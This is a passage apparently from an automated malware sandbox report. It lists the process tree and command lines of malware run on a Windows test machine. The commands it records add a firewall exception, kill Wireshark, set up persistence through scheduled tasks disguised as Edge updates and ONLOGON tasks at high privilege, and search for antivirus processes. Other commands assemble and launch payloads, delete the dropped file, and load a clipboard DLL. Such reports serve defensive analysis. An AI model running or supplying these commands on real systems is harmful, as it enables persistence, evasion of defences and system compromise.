PID:1856 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"3⤵
- Executes dropped EXE
PID:5800 -
C:\ProgramData\dllhost.exe"C:\ProgramData\dllhost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:2248 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:6592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:6992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:4584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:4880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:1160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:1524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:3204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:1248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:5240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:2024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:6468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:4196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:5320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:1660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:3864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:4188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1512
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:4016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:2540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:2184
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:6764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:2508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:6696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:3164
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:2780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:4280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:656
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:3956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6312
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:1008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:3432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:6340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:3752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:6924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:5648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:6160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:4968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:5616
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:1604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:2448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:5216
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:1076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:3004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:4532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:4888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:5628 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1392
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:3860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:1016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1440
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:2932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:3228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:1124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:2468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6332
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:2760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:5276
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵PID:5936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:3424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:7124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:1272
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "C:\Users\Admin\AppData\Local\Temp\Files\main.exe"4⤵PID:5400
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 55⤵PID:3276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\postbox.exe"C:\Users\Admin\AppData\Local\Temp\Files\postbox.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5524 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe"C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe"3⤵PID:3892
-
-
C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"3⤵
- Drops file in System32 directory
PID:7132 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2064
-
-
C:\Windows\system32\SubDir\main-pc.exe"C:\Windows\system32\SubDir\main-pc.exe"4⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5992 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe"C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3856 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 3484⤵
- Program crash
PID:2824
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seo.exe"C:\Users\Admin\AppData\Local\Temp\Files\seo.exe"3⤵PID:496
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit4⤵PID:4280
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7024
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:6068
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4195915⤵PID:6580
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "SAVEDBEDFLESHPROVIDED" Waves5⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J5⤵PID:6696
-
-
C:\Users\Admin\AppData\Local\Temp\419591\Predicted.pifPredicted.pif J5⤵PID:1280
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:6528
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\install_lodop32.exe"C:\Users\Admin\AppData\Local\Temp\Files\install_lodop32.exe"3⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:780
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"3⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\2217325085.exeC:\Users\Admin\AppData\Local\Temp\2217325085.exe4⤵
- System Location Discovery: System Language Discovery
PID:7000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe"C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe"3⤵
- Suspicious use of SetThreadContext
PID:5788 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:428
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:3740
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:5180
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:5916
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:7092
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"3⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\Files\KuwaitSetupHockey.exe"C:\Users\Admin\AppData\Local\Temp\Files\KuwaitSetupHockey.exe"3⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\is-HH1MQ.tmp\KuwaitSetupHockey.tmp"C:\Users\Admin\AppData\Local\Temp\is-HH1MQ.tmp\KuwaitSetupHockey.tmp" /SL5="$1402EA,3849412,851968,C:\Users\Admin\AppData\Local\Temp\Files\KuwaitSetupHockey.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"3⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5876 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵PID:4896
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RambledMime.exe"C:\Users\Admin\AppData\Local\Temp\Files\RambledMime.exe"3⤵
- Suspicious use of SetThreadContext
PID:4652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6760
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of SetThreadContext
PID:1888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe5⤵PID:5604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:6340 -
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6296 -
C:\Users\Admin\AppData\Local\Temp\10007740101\horo.exe"C:\Users\Admin\AppData\Local\Temp\10007740101\horo.exe"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4h88.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4h88.exe6⤵
- Adds Run key to start application
PID:3604 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A4Q93.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A4Q93.exe7⤵
- Adds Run key to start application
PID:544 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1H10C4.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1H10C4.exe8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5876
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Z1002.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Z1002.exe8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3H03E.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3H03E.exe7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6476
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C065K.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C065K.exe6⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7032
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main5⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:968
-
-
C:\Users\Admin\AppData\Local\Temp\10007960101\21a33c536e.exe"C:\Users\Admin\AppData\Local\Temp\10007960101\21a33c536e.exe"5⤵PID:1708
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main5⤵PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\10007980101\546a0dd67b.exe"C:\Users\Admin\AppData\Local\Temp\10007980101\546a0dd67b.exe"5⤵PID:5736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\LukeJazz.exe"C:\Users\Admin\AppData\Local\Temp\Files\LukeJazz.exe"3⤵PID:5132
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k copy Decide Decide.cmd & Decide.cmd & exit4⤵PID:6160
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5572
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:5840
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:876
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:492
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4375705⤵PID:6184
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BASEDADVERTISEAFGHANISTANCONTENT" Sacramento5⤵PID:6404
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Avi + Hits + Joyce + Desk + Cheers + Cleanup + Generate + Hobbies + Possible + Rover + Notifications + Unique + Helpful + Constantly + Namibia + Revolution + Transfers + Index + Colors 437570\b5⤵PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif437570\Ul.pif 437570\b5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1380
-
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6648
-
-
-
-
